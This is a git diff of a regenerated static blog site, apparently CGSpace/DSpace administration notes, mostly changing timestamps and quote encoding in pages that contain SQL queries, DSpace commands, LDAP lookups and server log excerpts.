                                                                                                                                                                                                                                                                                                                                                                              dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                              dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                               COPY 54701
                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                              Read more → diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html index 83cdeea49..50ae97f8b 100644 --- a/docs/posts/page/7/index.html +++ b/docs/posts/page/7/index.html @@ -10,14 +10,14 @@ - + - + @@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                            • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                            • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                            Read more → @@ -210,7 +210,7 @@
                                                                                                                                                                                                                                                                                                                                                                            • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                            dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                               id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                             -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                              92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                            @@ -268,11 +268,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                          • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                          • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                          2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                          +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                          • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                          • I’ve raised a ticket with Atmire to ask
                                                                                                                                                                                                                                                                                                                                                                          • @@ -354,7 +354,7 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                          • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                          • It looks like we might be able to use OUs now, instead of DCs:
                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                          Read more → diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html index 8518ed98e..905d5e6c5 100644 --- a/docs/posts/page/8/index.html +++ b/docs/posts/page/8/index.html @@ -10,14 +10,14 @@ - + - + @@ -140,9 +140,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                                        • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                                        • I think this query should find and replace all authors that have “,” at the end of their names:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                         UPDATE 95
                                                                                                                                                                                                                                                                                                                                                                        -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                        +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                                          text_value
                                                                                                                                                                                                                                                                                                                                                                         ------------
                                                                                                                                                                                                                                                                                                                                                                         (0 rows)
                                                                                                                                                                                                                                                                                                                                                                        @@ -198,7 +198,7 @@ dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                      • I have blocked access to the API now
                                                                                                                                                                                                                                                                                                                                                                      • There are 3,000 IPs accessing the REST API in a 24-hour period!
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      # awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                       3168
                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                      Read more → @@ -350,7 +350,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
                                                                                                                                                                                                                                                                                                                                                                    • Looks like DSpace exhausted its PostgreSQL connection pool
                                                                                                                                                                                                                                                                                                                                                                    • Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
                                                                                                                                                                                                                                                                                                                                                                     78
                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                    Read more → diff --git a/docs/sitemap.xml b/docs/sitemap.xml index 102c7b085..80ccc49af 100644 --- a/docs/sitemap.xml +++ b/docs/sitemap.xml @@ -3,19 +3,19 @@ xmlns:xhtml="http://www.w3.org/1999/xhtml"> https://alanorth.github.io/cgspace-notes/categories/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/2022-03/ - 2022-03-01T16:46:54+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/categories/notes/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/posts/ - 2022-03-01T17:17:27+03:00 + 2022-03-01T17:48:40+03:00 https://alanorth.github.io/cgspace-notes/2022-02/ 2022-03-01T17:17:27+03:00 diff --git a/docs/tags/index.html b/docs/tags/index.html index 5c167b922..335b05c1e 100644 --- a/docs/tags/index.html +++ b/docs/tags/index.html @@ -17,7 +17,7 @@ - + diff --git a/docs/tags/migration/index.html b/docs/tags/migration/index.html index d99d42992..9f5739f67 100644 --- a/docs/tags/migration/index.html +++ b/docs/tags/migration/index.html @@ -17,7 +17,7 @@ - + diff --git a/docs/tags/notes/index.html b/docs/tags/notes/index.html index a1fd3509a..cfaad2f96 100644 --- a/docs/tags/notes/index.html +++ b/docs/tags/notes/index.html @@ -17,7 +17,7 @@ - + @@ -227,7 +227,7 @@
                                                                                                                                                                                                                                                                                                                                                                  • Remove redundant/duplicate text in the DSpace submission license
                                                                                                                                                                                                                                                                                                                                                                  • Testing the CMYK patch on a collection with 650 items:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  $ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                  Read more → @@ -286,7 +286,7 @@
                                                                                                                                                                                                                                                                                                                                                                  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from collection2item where item_id = '80278';
                                                                                                                                                                                                                                                                                                                                                                     id   | collection_id | item_id
                                                                                                                                                                                                                                                                                                                                                                   -------+---------------+---------
                                                                                                                                                                                                                                                                                                                                                                    92551 |           313 |   80278
                                                                                                                                                                                                                                                                                                                                                                  @@ -344,11 +344,11 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                • CGSpace was down for five hours in the morning while I was sleeping
                                                                                                                                                                                                                                                                                                                                                                • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                -2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                +2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
                                                                                                                                                                                                                                                                                                                                                                • I’ve raised a ticket with Atmire to ask
                                                                                                                                                                                                                                                                                                                                                                • diff --git a/docs/tags/notes/index.xml b/docs/tags/notes/index.xml index 6e5bd9dba..e00f6126a 100644 --- a/docs/tags/notes/index.xml +++ b/docs/tags/notes/index.xml @@ -105,7 +105,7 @@ <li>Remove redundant/duplicate text in the DSpace submission license</li> <li>Testing the CMYK patch on a collection with 650 items:</li> </ul> -<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt +<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt </code></pre> @@ -146,7 +146,7 @@ <ul> <li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li> </ul> -<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278'; +<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;; id | collection_id | item_id -------+---------------+--------- 92551 | 313 | 80278 @@ -186,11 +186,11 @@ DELETE 1 <li>CGSpace was down for five hours in the morning while I was sleeping</li> <li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li> </ul> -<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;) -2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;) +<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;) +2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;) </code></pre><ul> <li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li> <li>I&rsquo;ve raised a ticket with Atmire to ask</li> @@ -245,7 +245,7 @@ DELETE 1 <li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li> <li>It looks like we might be able to use OUs now, instead of DCs:</li> </ul> -<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot; +<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34; </code></pre> @@ -281,9 +281,9 @@ $ git rebase -i dspace-5.5 <li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li> <li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li> </ul> -<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; UPDATE 95 -dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$'; +dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;; text_value ------------ (0 rows) @@ -321,7 +321,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>I have blocked access to the API now</li> <li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li> </ul> -<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l +<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l 3168 </code></pre> @@ -419,7 +419,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and <li>Looks like DSpace exhausted its PostgreSQL connection pool</li> <li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li> </ul> -<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace +<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace 78 </code></pre> diff --git a/docs/tags/notes/page/2/index.html b/docs/tags/notes/page/2/index.html index 9ca38f38e..12270003b 100644 --- a/docs/tags/notes/page/2/index.html +++ b/docs/tags/notes/page/2/index.html @@ -17,7 +17,7 @@ - + @@ -149,7 +149,7 @@
                                                                                                                                                                                                                                                                                                                                                                • We had been using DC=ILRI to determine whether a user was ILRI or not
                                                                                                                                                                                                                                                                                                                                                                • It looks like we might be able to use OUs now, instead of DCs:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                Read more → @@ -203,9 +203,9 @@ $ git rebase -i dspace-5.5
                                                                                                                                                                                                                                                                                                                                                              • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
                                                                                                                                                                                                                                                                                                                                                              • I think this query should find and replace all authors that have “,” at the end of their names:
                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                              dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                               UPDATE 95
                                                                                                                                                                                                                                                                                                                                                              -dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
                                                                                                                                                                                                                                                                                                                                                              +dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
